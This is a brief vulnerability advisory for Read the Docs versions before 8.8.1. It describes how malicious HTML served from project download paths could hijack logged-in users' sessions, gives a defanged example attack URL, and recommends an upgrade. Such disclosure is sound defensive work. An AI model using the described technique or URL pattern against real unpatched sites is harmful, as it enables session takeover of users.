Name of the Vulnerable Software and Affected Versions readthedocs versions prior to 8.8.1

Description This issue allowed a malicious user to serve arbitrary HTML files from the main application domain by exploiting a vulnerability in the code that serves downloadable content from a project. Exploiting this would have required the attacker to get a logged-in user to visit a malicious URL, which would have allowed the attacker to take control of the user's session with JavaScript, making requests to the API/site on behalf of the user. The malicious URL would have looked something like "hxxps://readthedocs.org/projects/attacker-project/downloads/html/version-with-javascript-attack/".

Recommendations For versions prior to 8.8.1, update to version 8.8.1 to resolve the issue.